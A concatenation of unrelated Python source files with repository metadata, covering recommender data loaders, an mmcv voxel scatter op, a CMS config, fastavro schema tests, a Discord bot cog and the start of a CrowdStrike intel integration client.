def uniform_negative_train_loader(self, num_negatives, batch_size, device):
"""Instance a Data_loader for training.
Sample 'num_negatives' negative items for each user, and shuffle them with positive items.
A batch of data in this DataLoader is suitable for a binary cross-entropy loss.
# todo implement the item popularity-biased sampling
"""
users, items, ratings = [], [], []
train_ratings = pd.merge(
self.ratings,
self.negatives[[DEFAULT_USER_COL, "negative_items"]],
on=DEFAULT_USER_COL,
)
train_ratings["negatives"] = train_ratings["negative_items"].apply(
lambda x: random.sample(x, num_negatives)
)
for _, row in train_ratings.iterrows():
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row[DEFAULT_ITEM_COL]))
ratings.append(float(row[DEFAULT_RATING_COL]))
for i in range(num_negatives):
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row.negatives[i]))
ratings.append(float(0)) # negative samples get 0 rating
dataset = RatingNegativeDataset(
user_tensor=torch.LongTensor(users).to(device),
item_tensor=torch.LongTensor(items).to(device),
rating_tensor=torch.FloatTensor(ratings).to(device),
)
return DataLoader(dataset, batch_size=batch_size, shuffle=True)
def pairwise_negative_train_loader(self, batch_size, device):
"""Instance a pairwise Data_loader for training.
Sample ONE negative items for each user-item pare, and shuffle them with positive items.
A batch of data in this DataLoader is suitable for a binary cross-entropy loss.
# todo implement the item popularity-biased sampling
"""
users, pos_items, neg_items = [], [], []
train_ratings = pd.merge(
self.ratings,
self.negatives[[DEFAULT_USER_COL, "negative_items"]],
on=DEFAULT_USER_COL,
)
train_ratings["one_negative"] = train_ratings["negative_items"].apply(
lambda x: random.sample(x, 1)
)
for _, row in train_ratings.iterrows():
users.append(int(row[DEFAULT_USER_COL]))
pos_items.append(int(row[DEFAULT_ITEM_COL]))
neg_items.append(int(row.one_negative[0]))
dataset = PairwiseNegativeDataset(
user_tensor=torch.LongTensor(users).to(device),
pos_item_tensor=torch.LongTensor(pos_items).to(device),
neg_item_tensor=torch.LongTensor(neg_items).to(device),
)
return DataLoader(dataset, batch_size=batch_size, shuffle=True)
@property
def evaluate_data(self):
"""Create evaluation data."""
test_ratings = pd.merge(
self.test_ratings,
self.negatives[[DEFAULT_USER_COL, "negative_samples"]],
on=DEFAULT_USER_COL,
)
test_users, test_items, ratings = [], [], []
for row in test_ratings.itertuples():
test_users.append(int(row[DEFAULT_USER_COL]))
test_items.append(int(row[DEFAULT_ITEM_COL]))
ratings.append(1)
for i in range(len(row.negative_samples)):
test_users.append(int(row[DEFAULT_USER_COL]))
test_items.append(int(row.negative_samples[i]))
ratings.append(0)
test_df = pd.DataFrame(
{
DEFAULT_USER_COL: test_users,
DEFAULT_ITEM_COL: test_items,
DEFAULT_RATING_COL: ratings,
}
)
return test_df
def get_adj_mat(self, config):
"""Get the adjacent matrix, if not previously stored then call the function to create.
This method is for NGCF model.
Returns:
Different types of adjacment matrix.
"""
process_file_name = (
"ngcf_"
+ config["dataset"]["dataset"]
+ "_"
+ config["dataset"]["data_split"]
+ (
("_" + str(config["dataset"]["percent"] * 100))
if "percent" in config
else ""
)
)
process_path = os.path.join(
config["system"]["process_dir"],
config["dataset"]["dataset"] + "/",
)
process_file_name = os.path.join(process_path, process_file_name)
ensureDir(process_file_name)
print(process_file_name)
try:
adj_mat = sp.load_npz(os.path.join(process_file_name, "s_adj_mat.npz"))
norm_adj_mat = sp.load_npz(
os.path.join(process_file_name, "s_norm_adj_mat.npz")
)
mean_adj_mat = sp.load_npz(
os.path.join(process_file_name, "s_mean_adj_mat.npz")
)
print("already load adj matrix", adj_mat.shape)
except Exception:
adj_mat, norm_adj_mat, mean_adj_mat = self.create_adj_mat()
sp.save_npz(os.path.join(process_file_name, "s_adj_mat.npz"), adj_mat)
sp.save_npz(
os.path.join(process_file_name, "s_norm_adj_mat.npz"), norm_adj_mat
)
sp.save_npz(
os.path.join(process_file_name, "s_mean_adj_mat.npz"), mean_adj_mat
)
return adj_mat, norm_adj_mat, mean_adj_mat
def create_adj_mat(self):
"""Create adjacent matirx from the user-item interaction matrix."""
adj_mat = sp.dok_matrix(
(self.n_users + self.n_items, self.n_users + self.n_items), dtype=np.float32
)
adj_mat = adj_mat.tolil()
R = sp.dok_matrix((self.n_users, self.n_items), dtype=np.float32)
user_np = np.array(self.ratings[DEFAULT_USER_COL])
item_np = np.array(self.ratings[DEFAULT_ITEM_COL])
for u in range(self.n_users):
index = list(np.where(user_np == u)[0])
i = item_np[index]
for item in i:
R[u, item] = 1
R = R.tolil()
adj_mat[: self.n_users, self.n_users :] = R
adj_mat[self.n_users :, : self.n_users] = R.T
adj_mat = adj_mat.todok()
print("already create adjacency matrix", adj_mat.shape)
norm_adj_mat = normalized_adj_single(adj_mat + sp.eye(adj_mat.shape[0]))
mean_adj_mat = normalized_adj_single(adj_mat)
print("already normalize adjacency matrix")
return adj_mat.tocsr(), norm_adj_mat.tocsr(), mean_adj_mat.tocsr()
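    # Illustrative note: the matrix built above follows the standard
    # bipartite layout used by NGCF-style models,
    #     A = [[0,   R],
    #          [R.T, 0]]
    # where R is the (n_users x n_items) interaction matrix. For example, if
    # user 0 interacted with item 1, row 0 of A carries a single 1 at column
    # n_users + 1. norm_adj_mat normalizes A + I, and mean_adj_mat normalizes
    # A itself via normalized_adj_single (presumably a one-sided D^-1 * A
    # normalization, judging by the name).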
def get_graph_embeddings(self, config):
"""Get the graph embedding, if not previously stored then call the function to create.
This method is for LCFN model.
Returns:
eigsh of the graph matrix
"""
process_file_name = (
"lcfn_"
+ config["dataset"]["dataset"]
+ "_"
+ config["dataset"]["data_split"]
+ (
("_" + str(config["dataset"]["percent"] * 100))
if "percent" in config
else ""
)
)
process_path = os.path.join(
config["system"]["process_dir"],
config["dataset"]["dataset"] + "/",
)
process_file_name = os.path.join(process_path, process_file_name)
ensureDir(process_file_name)
print(process_file_name)
try:
with open(process_file_name + "/graph_embeddings.json") as f:
line = f.readline()
graph_embeddings = json.loads(line)
f.close()
print("already load graph embeddings")
except Exception:
graph_embeddings = self.create_graph_embeddings(config)
f = open(process_file_name + "/graph_embeddings.json", "w")
jsObj = json.dumps(graph_embeddings)
f.write(jsObj)
f.close()
cut_off = config["model"]["cut_off"]
[graph_u, graph_i] = graph_embeddings
graph_u = np.array(graph_u)[:, 0 : int(cut_off * self.n_users)].astype(
np.float32
)
graph_i = np.array(graph_i)[:, 0 : int(cut_off * self.n_items)].astype(
np.float32
)
return [graph_u, graph_i]
def create_graph_embeddings(self, config):
"""Create graph embeddings from the user and item hypergraph."""
cut_off = config["model"]["cut_off"]
user_np = np.array(self.ratings[DEFAULT_USER_COL])
item_np = np.array(self.ratings[DEFAULT_ITEM_COL])
user_number = self.n_users
item_number = self.n_items
tolerant = 0.1 ** 5
epsilon = 0.1 ** 10
H_u = sp.lil_matrix((user_number, item_number))
H_v = sp.lil_matrix((item_number, user_number))
D_u = sp.lil_matrix((user_number, user_number))
D_v = sp.lil_matrix((item_number, item_number))
I_u = sp.lil_matrix(np.eye(user_number, user_number))
I_v = sp.lil_matrix(np.eye(item_number, item_number))
for user in range(self.n_users):
index = list(np.where(user_np == user)[0])
i = item_np[index]
for item in i:
H_u[user, item] = 1
H_v[item, user] = 1
D_u[user, user] += 1
D_v[item, item] += 1
print(" constructing user matrix...")
D_n = sp.lil_matrix((user_number, user_number))
D_e = sp.lil_matrix((item_number, item_number))
for i in range(user_number):
D_n[i, i] = 1.0 / max(np.sqrt(D_u[i, i]), epsilon)
for i in range(item_number):
D_e[i, i] = 1.0 / max(D_v[i, i], epsilon)
L_u = I_u - D_n * H_u * D_e * H_u.T * D_n
print(" constructing item matrix...")
D_n = sp.lil_matrix((item_number, item_number))
D_e = sp.lil_matrix((user_number, user_number))
for i in range(item_number):
D_n[i, i] = 1.0 / max(np.sqrt(D_v[i, i]), epsilon)
for i in range(user_number):
D_e[i, i] = 1.0 / max(D_u[i, i], epsilon)
L_v = I_v - D_n * H_v * D_e * H_v.T * D_n
print("Decomposing the laplacian matrices...")
print(" decomposing user matrix...")
[Lamda, user_graph_embeddings] = eigsh(
L_u, k=int(cut_off * self.n_users), which="SM", tol=tolerant
)
print(Lamda[0:10])
print(" decomposing item matrix...")
[Lamda, item_graph_embeddings] = eigsh(
L_v, k=int(cut_off * self.n_items), which="SM", tol=tolerant
)
print(Lamda[0:10])
return [user_graph_embeddings.tolist(), item_graph_embeddings.tolist()]
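# Minimal usage sketch of the dataset wrappers above; the tensor values are
# toy numbers made up purely for illustration.
if __name__ == "__main__":
    _users = torch.LongTensor([0, 0, 1, 1])
    _items = torch.LongTensor([3, 7, 2, 3])
    _ratings = torch.FloatTensor([1.0, 0.0, 1.0, 0.0])
    _loader = DataLoader(
        UserItemRatingDataset(_users, _items, _ratings),
        batch_size=2,
        shuffle=True,
    )
    for _u, _i, _r in _loader:
        # each batch yields a (users, items, ratings) triple of tensors
        print(_u, _i, _r)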
|
1973febd345f63af40483d65c46c5020399d81c9
|
04142fdda9b3fb29fb7456d5bc3e504985f24cbe
|
/mmcv/ops/scatter_points.py
|
5d881bfe63309fb406c123ee69d4e37125f45843
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmcv
|
419e301bbc1d7d45331d67eccfd673f290a796d5
|
6e9ee26718b22961d5c34caca4108413b1b7b3af
|
refs/heads/main
| 2023-08-31T07:08:27.223321
| 2023-08-28T09:02:10
| 2023-08-28T09:02:10
| 145,670,155
| 5,319
| 1,900
|
Apache-2.0
| 2023-09-14T02:37:16
| 2018-08-22T07:05:26
|
Python
|
UTF-8
|
Python
| false
| false
| 5,886
|
py
|
scatter_points.py
|
# Copyright (c) OpenMMLab. All rights reserved.
from typing import Any, List, Optional, Tuple
import torch
import torch.nn.functional as F
from torch import nn
from torch.autograd import Function
from ..utils import ext_loader
ext_module = ext_loader.load_ext(
'_ext',
['dynamic_point_to_voxel_forward', 'dynamic_point_to_voxel_backward'])
class _DynamicScatter(Function):
@staticmethod
def forward(ctx: Any,
feats: torch.Tensor,
coors: torch.Tensor,
reduce_type: str = 'max') -> Tuple[torch.Tensor, torch.Tensor]:
"""convert kitti points(N, >=3) to voxels.
Args:
feats (torch.Tensor): [N, C]. Points features to be reduced
into voxels.
coors (torch.Tensor): [N, ndim]. Corresponding voxel coordinates
(specifically multi-dim voxel index) of each points.
reduce_type (str, optional): Reduce op. support 'max', 'sum' and
'mean'. Default: 'max'.
Returns:
tuple[torch.Tensor]: A tuple contains two elements. The first one
is the voxel features with shape [M, C] which are respectively
reduced from input features that share the same voxel coordinates.
The second is voxel coordinates with shape [M, ndim].
"""
results = ext_module.dynamic_point_to_voxel_forward(
feats, coors, reduce_type)
(voxel_feats, voxel_coors, point2voxel_map,
voxel_points_count) = results
ctx.reduce_type = reduce_type
ctx.save_for_backward(feats, voxel_feats, point2voxel_map,
voxel_points_count)
ctx.mark_non_differentiable(voxel_coors)
return voxel_feats, voxel_coors
@staticmethod
def backward(ctx: Any,
grad_voxel_feats: torch.Tensor,
grad_voxel_coors: Optional[torch.Tensor] = None) -> tuple:
(feats, voxel_feats, point2voxel_map,
voxel_points_count) = ctx.saved_tensors
grad_feats = torch.zeros_like(feats)
# TODO: whether to use index put or use cuda_backward
# To use index put, need point to voxel index
ext_module.dynamic_point_to_voxel_backward(
grad_feats, grad_voxel_feats.contiguous(), feats, voxel_feats,
point2voxel_map, voxel_points_count, ctx.reduce_type)
return grad_feats, None, None
dynamic_scatter = _DynamicScatter.apply
class DynamicScatter(nn.Module):
"""Scatters points into voxels, used in the voxel encoder with dynamic
voxelization.
Note:
The CPU and GPU implementation get the same output, but have numerical
difference after summation and division (e.g., 5e-7).
Args:
voxel_size (list): list [x, y, z] size of three dimension.
point_cloud_range (list): The coordinate range of points, [x_min,
y_min, z_min, x_max, y_max, z_max].
average_points (bool): whether to use avg pooling to scatter points
into voxel.
"""
def __init__(self, voxel_size: List, point_cloud_range: List,
average_points: bool):
super().__init__()
self.voxel_size = voxel_size
self.point_cloud_range = point_cloud_range
self.average_points = average_points
def forward_single(
self, points: torch.Tensor,
coors: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Scatters points into voxels.
Args:
points (torch.Tensor): Points to be reduced into voxels.
coors (torch.Tensor): Corresponding voxel coordinates (specifically
multi-dim voxel index) of each points.
Returns:
tuple[torch.Tensor]: A tuple contains two elements. The first one
is the voxel features with shape [M, C] which are respectively
reduced from input features that share the same voxel coordinates.
The second is voxel coordinates with shape [M, ndim].
"""
reduce = 'mean' if self.average_points else 'max'
return dynamic_scatter(points.contiguous(), coors.contiguous(), reduce)
def forward(self, points: torch.Tensor,
coors: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Scatters points/features into voxels.
Args:
points (torch.Tensor): Points to be reduced into voxels.
coors (torch.Tensor): Corresponding voxel coordinates (specifically
multi-dim voxel index) of each points.
Returns:
tuple[torch.Tensor]: A tuple contains two elements. The first one
is the voxel features with shape [M, C] which are respectively
reduced from input features that share the same voxel coordinates.
The second is voxel coordinates with shape [M, ndim].
"""
if coors.size(-1) == 3:
return self.forward_single(points, coors)
else:
batch_size = coors[-1, 0] + 1
voxels, voxel_coors = [], []
for i in range(batch_size):
inds = torch.where(coors[:, 0] == i)
voxel, voxel_coor = self.forward_single(
points[inds], coors[inds][:, 1:])
coor_pad = F.pad(voxel_coor, (1, 0), mode='constant', value=i)
voxel_coors.append(coor_pad)
voxels.append(voxel)
features = torch.cat(voxels, dim=0)
feature_coors = torch.cat(voxel_coors, dim=0)
return features, feature_coors
def __repr__(self):
s = self.__class__.__name__ + '('
s += 'voxel_size=' + str(self.voxel_size)
s += ', point_cloud_range=' + str(self.point_cloud_range)
s += ', average_points=' + str(self.average_points)
s += ')'
return s
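# Minimal usage sketch, assuming a CUDA build of the extension is available;
# the voxel_size, point_cloud_range and tensor shapes below are arbitrary
# illustrative values.
if __name__ == '__main__':
    scatter = DynamicScatter(
        voxel_size=[0.5, 0.5, 0.5],
        point_cloud_range=[0, 0, 0, 10, 10, 10],
        average_points=True)
    feats = torch.rand(100, 4).cuda()  # [N, C] point features
    coors = torch.randint(0, 20, (100, 3), dtype=torch.int32).cuda()  # [N, 3]
    voxel_feats, voxel_coors = scatter(feats, coors)
    print(voxel_feats.shape, voxel_coors.shape)  # [M, 4] and [M, 3]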
|
d1274119b76521206c53f4d14a8e652501b75a52
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/CalibCalorimetry/CastorCalib/python/CastorDbProducer_cfi.py
|
6684add760b4c5d63c3d33eb50c749c21e9c4b8d
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 206
|
py
|
CastorDbProducer_cfi.py
|
import FWCore.ParameterSet.Config as cms
CastorDbProducer = cms.ESProducer( "CastorDbProducer",
appendToDataLabel = cms.string( "" )
)
|
9d2f58c08ef7ea1d28cfc8dbef6b870184575f13
|
e457ef64e939acc769d3b4609184f1603fdd875a
|
/tests/test_canonical_form.py
|
24baaf5fa9e140d543601918c21177fe164345ed
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
fastavro/fastavro
|
dbad8c55fabc9f22b16273ee1a926f22c840c694
|
40dfd526076446cc7f7eef97e40da216b910d047
|
refs/heads/master
| 2023-09-01T04:16:13.510802
| 2023-08-25T10:19:13
| 2023-08-25T11:05:36
| 3,845,895
| 430
| 105
|
MIT
| 2023-09-14T20:14:34
| 2012-03-27T16:29:38
|
Python
|
UTF-8
|
Python
| false
| false
| 14,428
|
py
|
test_canonical_form.py
|
import pytest
from fastavro.schema import to_parsing_canonical_form
from fastavro._schema_common import PRIMITIVES
@pytest.mark.parametrize(
"original_schema,canonical_form",
(
[(primitive, f'"{primitive}"') for primitive in PRIMITIVES]
+ [({"type": primitive}, f'"{primitive}"') for primitive in PRIMITIVES]
),
)
def test_primitive_conversion(original_schema, canonical_form):
assert to_parsing_canonical_form(original_schema) == canonical_form
def test_fullname_conversion():
schema = {
"namespace": "namespace",
"name": "test_fullname_conversion",
"type": "record",
"fields": [],
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"namespace.test_fullname_conversion","type":"record","fields":[]}'
)
def test_fullname_conversion_empty_namespace():
schema = {
"namespace": "",
"name": "test_fullname_conversion_empty_namespace",
"type": "record",
"fields": [],
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_fullname_conversion_empty_namespace","type":"record","fields":[]}'
)
def test_fullname_conversion_no_namespace():
schema = {
"name": "test_fullname_conversion_no_namespace",
"type": "record",
"fields": [],
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_fullname_conversion_no_namespace","type":"record","fields":[]}'
)
def test_remove_doc():
schema = {"name": "test_remove_doc", "type": "record", "fields": [], "doc": "doc"}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_remove_doc","type":"record","fields":[]}'
)
def test_remove_aliases():
schema = {
"name": "test_remove_aliases",
"type": "record",
"fields": [],
"aliases": "alias",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_remove_aliases","type":"record","fields":[]}'
)
def test_record_field_order():
schema = {
"fields": [],
"name": "test_record_field_order",
"type": "record",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_record_field_order","type":"record","fields":[]}'
)
def test_enum_field_order():
schema = {
"symbols": ["A", "B"],
"name": "test_enum_field_order",
"type": "enum",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_enum_field_order","type":"enum","symbols":["A","B"]}'
)
def test_array_field_order():
schema = {"items": "int", "type": "array"}
assert to_parsing_canonical_form(schema) == '{"type":"array","items":"int"}'
def test_map_field_order():
schema = {"values": "int", "type": "map"}
assert to_parsing_canonical_form(schema) == '{"type":"map","values":"int"}'
def test_fixed_field_order():
schema = {
"size": 4,
"name": "test_fixed_field_order",
"type": "fixed",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_fixed_field_order","type":"fixed","size":4}'
)
@pytest.mark.parametrize(
"original_schema,canonical_form",
[
(
{
"type": "array",
"items": {"type": "enum", "name": "Test", "symbols": ["A", "B"]},
},
'{"type":"array","items":{"name":"Test","type":"enum","symbols":["A","B"]}}',
),
(
{
"type": "map",
"values": {"type": "enum", "name": "Test", "symbols": ["A", "B"]},
},
'{"type":"map","values":{"name":"Test","type":"enum","symbols":["A","B"]}}',
),
(
["string", "null", "long"],
'["string","null","long"]',
),
(
{
"type": "record",
"name": "Test",
"fields": [{"name": "f", "type": "long"}],
},
'{"name":"Test","type":"record","fields":[{"name":"f","type":"long"}]}',
),
(
{
"type": "error",
"name": "Test",
"fields": [{"name": "f", "type": "long"}],
},
'{"name":"Test","type":"record","fields":[{"name":"f","type":"long"}]}',
),
(
{
"type": "record",
"name": "Node",
"fields": [
{"name": "label", "type": "string"},
{"name": "children", "type": {"type": "array", "items": "Node"}},
],
},
(
'{"name":"Node","type":"record","fields":[{"name":"label","type'
+ '":"string"},{"name":"children","type":{"type":"array","items'
+ '":"Node"}}]}'
),
),
(
{
"type": "record",
"name": "Lisp",
"fields": [
{
"name": "value",
"type": [
"null",
"string",
{
"type": "record",
"name": "Cons",
"fields": [
{"name": "car", "type": "Lisp"},
{"name": "cdr", "type": "Lisp"},
],
},
],
},
],
},
(
'{"name":"Lisp","type":"record","fields":[{"name":"value","type'
+ '":["null","string",{"name":"Cons","type":"record","fields":['
+ '{"name":"car","type":"Lisp"},{"name":"cdr","type":"Lisp"}]}]'
+ "}]}"
),
),
(
{
"type": "record",
"name": "HandshakeRequest",
"namespace": "org.apache.avro.ipc",
"fields": [
{
"name": "clientHash",
"type": {"type": "fixed", "name": "MD5", "size": 16},
},
{"name": "clientProtocol", "type": ["null", "string"]},
{"name": "serverHash", "type": "MD5"},
{
"name": "meta",
"type": ["null", {"type": "map", "values": "bytes"}],
},
],
},
(
'{"name":"org.apache.avro.ipc.HandshakeRequest","type":"record"'
+ ',"fields":[{"name":"clientHash","type":{"name":"org.apache.a'
+ 'vro.ipc.MD5","type":"fixed","size":16}},{"name":"clientProto'
+ 'col","type":["null","string"]},{"name":"serverHash","type":"'
+ 'org.apache.avro.ipc.MD5"},{"name":"meta","type":["null",{"ty'
+ 'pe":"map","values":"bytes"}]}]}'
),
),
(
{
"type": "record",
"name": "HandshakeResponse",
"namespace": "org.apache.avro.ipc",
"fields": [
{
"name": "match",
"type": {
"type": "enum",
"name": "HandshakeMatch",
"symbols": ["BOTH", "CLIENT", "NONE"],
},
},
{"name": "serverProtocol", "type": ["null", "string"]},
{
"name": "serverHash",
"type": ["null", {"name": "MD5", "size": 16, "type": "fixed"}],
},
{
"name": "meta",
"type": ["null", {"type": "map", "values": "bytes"}],
},
],
},
(
'{"name":"org.apache.avro.ipc.HandshakeResponse","type":"record'
+ '","fields":[{"name":"match","type":{"name":"org.apache.avro.'
+ 'ipc.HandshakeMatch","type":"enum","symbols":["BOTH","CLIENT"'
+ ',"NONE"]}},{"name":"serverProtocol","type":["null","string"]'
+ '},{"name":"serverHash","type":["null",{"name":"org.apache.av'
+ 'ro.ipc.MD5","type":"fixed","size":16}]},{"name":"meta","type'
+ '":["null",{"type":"map","values":"bytes"}]}]}'
),
),
(
{
"type": "record",
"name": "Interop",
"namespace": "org.apache.avro",
"fields": [
{"name": "intField", "type": "int"},
{"name": "longField", "type": "long"},
{"name": "stringField", "type": "string"},
{"name": "boolField", "type": "boolean"},
{"name": "floatField", "type": "float"},
{"name": "doubleField", "type": "double"},
{"name": "bytesField", "type": "bytes"},
{"name": "nullField", "type": "null"},
{
"name": "arrayField",
"type": {"type": "array", "items": "double"},
},
{
"name": "mapField",
"type": {
"type": "map",
"values": {
"name": "Foo",
"type": "record",
"fields": [{"name": "label", "type": "string"}],
},
},
},
{
"name": "unionField",
"type": [
"boolean",
"double",
{"type": "array", "items": "bytes"},
],
},
{
"name": "enumField",
"type": {
"type": "enum",
"name": "Kind",
"symbols": ["A", "B", "C"],
},
},
{
"name": "fixedField",
"type": {"type": "fixed", "name": "MD5", "size": 16},
},
{
"name": "recordField",
"type": {
"type": "record",
"name": "Node",
"fields": [
{"name": "label", "type": "string"},
{
"name": "children",
"type": {"type": "array", "items": "Node"},
},
],
},
},
],
},
(
'{"name":"org.apache.avro.Interop","type":"record","fields":[{"'
+ 'name":"intField","type":"int"},{"name":"longField","type":"l'
+ 'ong"},{"name":"stringField","type":"string"},{"name":"boolFi'
+ 'eld","type":"boolean"},{"name":"floatField","type":"float"},'
+ '{"name":"doubleField","type":"double"},{"name":"bytesField",'
+ '"type":"bytes"},{"name":"nullField","type":"null"},{"name":"'
+ 'arrayField","type":{"type":"array","items":"double"}},{"name'
+ '":"mapField","type":{"type":"map","values":{"name":"org.apac'
+ 'he.avro.Foo","type":"record","fields":[{"name":"label","type'
+ '":"string"}]}}},{"name":"unionField","type":["boolean","doub'
+ 'le",{"type":"array","items":"bytes"}]},{"name":"enumField","'
+ 'type":{"name":"org.apache.avro.Kind","type":"enum","symbols"'
+ ':["A","B","C"]}},{"name":"fixedField","type":{"name":"org.ap'
+ 'ache.avro.MD5","type":"fixed","size":16}},{"name":"recordFie'
+ 'ld","type":{"name":"org.apache.avro.Node","type":"record","f'
+ 'ields":[{"name":"label","type":"string"},{"name":"children",'
+ '"type":{"type":"array","items":"org.apache.avro.Node"}}]}}]}'
),
),
(
{
"type": "record",
"name": "ipAddr",
"fields": [
{
"name": "addr",
"type": [
{"name": "IPv6", "type": "fixed", "size": 16},
{"name": "IPv4", "type": "fixed", "size": 4},
],
}
],
},
(
'{"name":"ipAddr","type":"record","fields":[{"name":"addr","typ'
+ 'e":[{"name":"IPv6","type":"fixed","size":16},{"name":"IPv4",'
+ '"type":"fixed","size":4}]}]}'
),
),
(
{
"type": "record",
"name": "TestDoc",
"doc": "Doc string",
"fields": [{"name": "name", "type": "string", "doc": "Doc String"}],
},
(
'{"name":"TestDoc","type":"record","fields":[{"name":"name","ty'
+ 'pe":"string"}]}'
),
),
(
{
"type": "enum",
"name": "Test",
"symbols": ["A", "B"],
"doc": "Doc String",
},
'{"name":"Test","type":"enum","symbols":["A","B"]}',
),
],
)
def test_random_cases(original_schema, canonical_form):
# All of these random test cases came from the test cases here:
# https://github.com/apache/avro/blob/0552c674637dd15b8751ed5181387cdbd81480d5/lang/py3/avro/tests/test_normalization.py
assert to_parsing_canonical_form(original_schema) == canonical_form
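# A small extra sketch (not from the upstream suite): schemas that differ only
# in attribute order and documentation reduce to the same canonical string,
# which is what makes the canonical form useful for equality checks and
# fingerprinting.
def test_canonical_form_equality_sketch():
    schema_a = {
        "type": "record",
        "name": "T",
        "doc": "docs are stripped",
        "fields": [{"name": "f", "type": "long"}],
    }
    schema_b = {
        "fields": [{"name": "f", "type": "long"}],
        "name": "T",
        "type": "record",
    }
    assert to_parsing_canonical_form(schema_a) == to_parsing_canonical_form(
        schema_b
    )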
|
e37202de46648db3c908a958f5dae661d239c1ed
|
04d9a118a63675c55abe63ccbd8498c6b02f9f80
|
/Cogs/Spooktober.py
|
837c66fb00aae7826aa43ce7c14f5c87696a1812
|
[
"MIT"
] |
permissive
|
corpnewt/CorpBot.py
|
06bd5ddc47adeecdae3ead6138378f9f88fe2b39
|
8c7d8fa412bd9728033bf0c5e0916c6ee9e86423
|
refs/heads/rewrite
| 2023-08-19T05:20:07.877579
| 2023-08-16T23:03:15
| 2023-08-16T23:03:15
| 68,509,454
| 393
| 201
|
MIT
| 2022-09-14T17:21:43
| 2016-09-18T08:59:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
Spooktober.py
|
import asyncio, discord, random, re
from datetime import datetime
from discord.ext import commands
from Cogs import Utils
def setup(bot):
settings = bot.get_cog("Settings")
bot.add_cog(Spooktober(bot, settings))
class Spooktober(commands.Cog):
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
self.spoop_re = re.compile(r"sp[o0]{2,}(k|p)")
global Utils
Utils = self.bot.get_cog("Utils")
async def message(self, message):
if datetime.today().month == 10 and datetime.today().day == 31:
if not self.settings.getGlobalStat("Spooking", False):
# We have this turned off - bail
return
# it is the day of ultimate sp00p, sp00p all the messages
if self.spoop_re.search(message.content.lower()):
await message.add_reaction("🎃")
@commands.command(pass_context=True)
async def spooking(self, ctx, *, yes_no = None):
"""Enables/Disables reacting 🎃 to every sp00py message on Halloween (owner only)."""
if not await Utils.is_owner_reply(ctx): return
await ctx.send(Utils.yes_no_setting(ctx,"Spooking","Spooking",yes_no,is_global=True))
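# Quick sketch of what the spoop regex matches (illustrative inputs only):
# at least two o/0 characters between "sp" and a "k" or "p".
if __name__ == "__main__":
    _spoop_re = re.compile(r"sp[o0]{2,}(k|p)")
    for _msg in ("spooky", "sp00py", "spoky", "so spoooooky!"):
        print(_msg, "->", bool(_spoop_re.search(_msg)))
    # spooky -> True, sp00py -> True, spoky -> False, so spoooooky! -> True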
|
be476df4aac41dcfdbff074a8735f9060f0e0e8d
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/CrowdStrikeIntel/Integrations/CrowdStrikeFalconIntel_v2/CrowdStrikeFalconIntel_v2.py
|
90b3964516b767e86a58c0ac67908432a9870126
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 24,511
|
py
|
CrowdStrikeFalconIntel_v2.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from datetime import datetime, timezone
from typing import Union, Any, Dict
from dateparser import parse
import urllib3
import traceback
# Disable insecure warnings
urllib3.disable_warnings()
''' GLOBAL VARIABLES '''
MALICIOUS_DICTIONARY: Dict[Any, int] = {
'low': Common.DBotScore.GOOD,
'medium': Common.DBotScore.SUSPICIOUS,
'high': Common.DBotScore.BAD
}
MALICIOUS_THRESHOLD = MALICIOUS_DICTIONARY.get(demisto.params().get('threshold', 'high'))
''' CLIENT '''
class Client:
"""
The integration's client
"""
def __init__(self, params: Dict[str, str], reliability: Optional[DBotScoreReliability] = None):
self.cs_client: CrowdStrikeClient = CrowdStrikeClient(params=params)
self.reliability = reliability
self.query_params: Dict[str, str] = {'offset': 'offset', 'limit': 'limit', 'sort': 'sort', 'free_search': 'q'}
self.date_params: Dict[str, Dict[str, str]] = {
'created_date': {'operator': '', 'api_key': 'created_date'},
'last_updated_date': {'operator': '', 'api_key': 'last_updated'},
'max_last_modified_date': {'operator': '<=', 'api_key': 'last_modified_date'},
'min_last_activity_date': {'operator': '>=', 'api_key': 'first_activity_date'},
'max_last_activity_date': {'operator': '<=', 'api_key': 'last_activity_date'},
}
def build_request_params(self, args: Dict[str, Any]) -> Dict[str, Any]:
"""
Build the params dict for the request
:param args: Cortex XSOAR args
:return: The params dict
"""
params: Dict[str, Any] = {key: args.get(arg) for arg, key in self.query_params.items()}
query = args.get('query')
params['filter'] = query if query else self.build_filter_query(args)
return assign_params(**params)
def build_filter_query(self, args: Dict[str, str]) -> str:
"""
Builds the filter query in Falcon Query Language (FQL)
:param args: Cortex XSOAR args
:return: The query
"""
filter_query: str = str()
for key in args:
if key not in self.query_params:
if key not in self.date_params:
values: List[str] = argToList(args[key], ',')
for value in values:
filter_query += f"{key}:'{value}'+"
else:
